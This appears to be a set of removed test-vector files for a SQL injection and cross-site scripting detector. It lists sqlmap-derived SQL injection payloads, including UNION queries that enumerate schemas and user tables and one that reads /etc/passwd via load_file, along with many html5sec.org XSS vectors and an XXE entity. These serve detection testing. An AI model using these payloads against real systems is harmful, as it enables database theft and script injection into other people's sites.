1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('OhUO' LIKE 'OhUO
1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('sonC'='sonC
1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('LfMY'='LfMY
1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('MWjv' LIKE 'MWjv
1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('FTHS'='FTHS
1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('igdM' LIKE 'igdM
1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('WZKG' LIKE 'WZKG
1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('yWmg'='yWmg
1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('FUsX' LIKE 'FUsX
1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('mBLH'='mBLH
1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (3370=3370
1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- rXfN
1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (9212=9212
1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- KZqT
1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (9114=9114
1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- eHGn
1)) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((2068=2068
1)) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((7248=7248
1)) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((3064=3064
1))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (((5697=5697
1))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (((1805=1805
1))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (((5031=5031
EXP(~(SELECT * FROM (SELECT CONCAT(0x71786a7671,(SELECT (ELT(7823=7823,1))),0x7162716b71,0x78))x))


@ -1,22 +0,0 @@
#
# Attacks pulled out of the examples from SQLMAP
#
# https:#svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2mssqlhash.py
1%23%0AAND%23%0A9227=9227
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2morehash.py
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2hash.py
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2dash.py
1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/modsecurityzeroversioned.py
1+/*!00000AND+2>1*/--'
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/halfversionedmorekeywords.py
value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa


@ -1,56 +0,0 @@
1' and '1' like '1
1' and '1' like '0
1' and 0 < (select length(@@version)) and '1' like '1
1' own3d by 1
1' order by 1#
1' order by 15000#
1' order by 2 #
1' order by 4 #
1' order by 3 #
1' and 1=0 union all select 0x373134,0x373135#
1' and 1 = 0 UNION ALL SELECT 0,CONCAT(@@version,0x5468655f4d6f6c652e46316e67657221)#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.schemata where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 0 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 2 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 4 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 6 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 1 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 3 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 5 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b limit 1 offset 0 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 1 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 0 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(user(), 0x20),IFNULL(version(), 0x20),IFNULL(database(), 0x20)),0x3a3a2d3a3a)#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f6574632f70617373776f7264), 0x20)),0x3a3a2d3a3a)#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f746d702f6a756e6b), 0x20)),0x3a3a2d3a3a)#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.adm where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin_users where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admins where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrator where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrador where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administradores where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.client where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.clients where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.jos_users where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.login where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.logins where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user_admin where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.users where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuario where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios_admin where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usr where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usrs where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.wp_users where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d6173 and table_name like 0x2541424c4525#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 4 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 5 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 2 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 0 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 3 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 1 #


@ -1,3 +0,0 @@
# https://github.com/client9/libinjection/issues/68
%3Cobject%00IRSDL+allowScriptAccess%3Dalways+data%3D%2F%2F0me.me%2Fdemo%2Fxss%2Fflash%2FnormalEmbededXSS.swf%3F


@ -1,3 +0,0 @@
# https://twitter.com/0x6D6172696F/status/394932823645503488
# http://pastebin.com/jNPbhduR
<p style="font-family:',;a\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d\\61lert\\28\\31\\29\\3e:1'">


@ -1,4 +0,0 @@
#
# https://github.com/angular/angular.js/pull/11290
#
<animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />


@ -1,488 +0,0 @@
#
# http://html5sec.org
# retreieved 2013-11-06
test 1 <form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
# obsolete firefox 3
#test 2 <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
# obsolete firefox 3
#test 3 <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
test 4 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
test 5 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
test 6 <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
test 7 <input onfocus=write(1) autofocus>
test 8 <input onblur=write(1) autofocus><input autofocus>
test 9 <a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
test 10 <video poster=javascript:alert(1)//></video>
test 11 <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
test 12 <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
# opera only, only "DoS"
# test 13 <x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
# opera only, "DoS"
# test 14 <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
test 15 <script>({0:#0=alert/#0#/#0#(0)})</script>
test 16 X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
test 17 <?xml-stylesheet href="javascript:alert(1)"?><root/>
test 18 <script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>
# obsolete firefox 3
# test 19 <meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
test 20 <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
test 21 <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
test 22 <input onblur=focus() autofocus><input>
test 23 <form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
test 24 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>
test 25 <script src="#">{alert(1)}</script>;1
# obsolete firefox 4 and under
# test 26 +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
test 27 <style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
test 28 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>
test 29 <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
test 30 <style>@import "data:,*%7bx:expression(write(1))%7D";</style>
test 31_1 <frameset onload=alert(1)>
test 31_2 <body onload=alert(1)>
test 32 <table background="javascript:alert(1)"></table>
test 33 <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
test 34 1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%25;height:100%25 src=test.vml#xss></vmlframe>
test 35 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
test 36 <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
test 37 <!--<img src="--><img src=x onerror=alert(1)//">
test 38 <comment><img src="</comment><img src=x onerror=alert(1)//">
# obsolete, FF 3.6 and Opera 11
#test 39_1 <![><img src="]><img src=x onerror=alert(1)//">
test 39_2 <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
test 40 <style><img src="</style><img src=x onerror=alert(1)//">
test 41 <li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
test 42 <head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
test 43 <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style>
test 44 <style>*[{}@import'test.css?]{color: green;}</style>X
test 45 <div style="font-family:'foo[a];color:red;';">XXX</div>
test 46 <div style="font-family:foo}color=red;">XXX</div>
test 47 <svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
test 48 <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
test 49 <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
test 50 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
test 51 <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
test 52 <x style="behavior:url(test.sct)">
test 53_1 <xml id="xss" src="test.htc"></xml>
test 53_2 <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
test 54 <script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script
test 55_1 <video><source onerror="alert(1)">
test 55_2 <audio><source onerror="alert(1)">
test 56 <video onerror="alert(1)"><source></source></video>
#
# Obsolete.. Firefox 3.6, Chrome 5, Safari 4
#
# test 57 <b <script>alert(1)//</script>0</script></b>
#
# Obsolete Firefox 3.6
#
#test 58 <b><script<b></b><alert(1)</script </b></b>
test 59 <div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
# we reject all styles
# test 60 TBD Obfuscation css-properties and values via ignored extra characters
# we reject all styles
# test 61 TBD CSS encoding and escaping
# IE9 parses this as NOT-XSS
# <x ?="foo"/><x foo="><img src=x onerror=alert(1)//"/>
#
#
test 62_1 <x '="foo"><x foo='><img src=x onerror=alert(1)//'>
#
# IE9 parses this as XSS
# <!-- ="foo"><x foo --><img onerror="alert(1)//'" src="x"/>
#
test 62_2 <! '="foo"><x foo='><img src=x onerror=alert(2)//'>
#
# IE9 parses this as XSS as previous
#
test 62_3 <? '="foo"><x foo='><img src=x onerror=alert(3)//'>
# bonus -- correctly detected
test 62_4 <!-- '="foo"><x foo='--><img src=x onerror=alert(2)//'>
# bonus -- quotes reversed
# same as 62_2
test 62_5 <! "='foo'><x foo="><img src=x onerror=alert(2)//">
# bonus - use of backquotes
test 62_5 <! `='foo'><x foo=`><img src=x onerror=alert(2)//`>
# bonus
<!-- "='foo'><x -->"><img src=x onerror=alert(1)//">
<!-- "=foo><x -->"><img src=x onerror=alert(1)//">
<!-- "foo><x -->"><img src=x onerror=alert(1)//">
<!-- "foo'><x -->"><img src=x onerror=alert(1)//">
test 63_1 <embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.↓, GC6↓,
test 63_2 <img src="javascript:alert(2)">
test 63_3 <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.
test 63_4 <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.
test 64_1 <!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
test 64_2 <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
test 65 <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
test 66 <?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>
test 67 <!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)"> ]><img />
test 68 <doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x> </doc>
test 69 <card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
test 70 <div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
test 71 <// style=x:expression\28write(1)\29>
test 72 <form><button formaction="javascript:alert(1)">X</button>
test 73 <event-source src="event.php" onload="alert(1)">
test 74 <a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
test 75 <script<{alert(1)}/></script </>
test 76_1 <?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
test 72_2 <!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='alert(1)'/&#x3E;">
test 77 <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
test 78 <?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
test 79 <object allowscriptaccess="always" data="test.swf"></object>
# test 80 TBD IE6 and halfwidth/fullwidth Unicode characters
test 81 <x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
test 82 <?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
test 83 <x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
test 84 <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x
test 85 <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
test 86 <script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>
test 86 <body oninput=alert(1)><input autofocus>
test 87 <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)">
test 88_0 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
test 88_1 <animation xlink:href="javascript:alert(1)"/>
test 88_2 <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
test 88_3 <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
test 88_4 <foreignObject xlink:href="javascript:alert(1)"/>
test 88_5 <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/>
test 89_1 <set attributeName="onmouseover" to="alert(1)"/>
test 89_2 <animate attributeName="onunload" to="alert(1)"/>
test 90_1 <div style=content:url(test2.svg)></div>
test 90_2 <div style="background:url(test5.svg)">PRESS ENTER</div>
test 90_3 <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)"> <!-- this file can be crossdomain if "action" attribute refers to an external file --> <meta http-equiv="refresh" content="1;URL=test5.svg"/> <input type="submit" autofocus="autofocus"/> </form>
# test 91
test 91_1 <? foo="><script>alert(1)</script>">
test 91_2 <! foo="><script>alert(1)</script>">
test 91_3 </ foo="><script>alert(1)</script>">
# obsolete Safari 4
#test 91_4 <? foo="><x foo='?><script>alert(1)</script>'>">
# obsolete Opera 11
#test 91_5 <! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">
test 91_6 <%25 foo><x foo="%25><script>alert(1)</script>">
test 92 <div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
test 93 <div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
test 94_1 <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler>
test 94_2 <svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg>
test 95_1 <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage>
test 95_2 <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
test 96_1 <iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
test 96_2 <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
test 97_1 <div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML+='';</script>
test 97_2 <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script>
test 98 <div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
test 99 XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!-- --><!--*{color:red} /* all UA */ *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ </style>
# <img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
#
# normal case
test 100_0 <img src=x onerror="alert(1)">
# [a]case
test 100_1 <img%09src=x onerror="alert(1)">
test 100_2 <img%0Asrc=x onerror="alert(1)">
test 100_3 <img%0Csrc=x onerror="alert(1)">
test 100_4 <img%0Dsrc=x onerror="alert(1)">
test 100_5 <img%20src=x onerror="alert(1)">
test 100_6 <img%47src=x onerror="alert(1)">
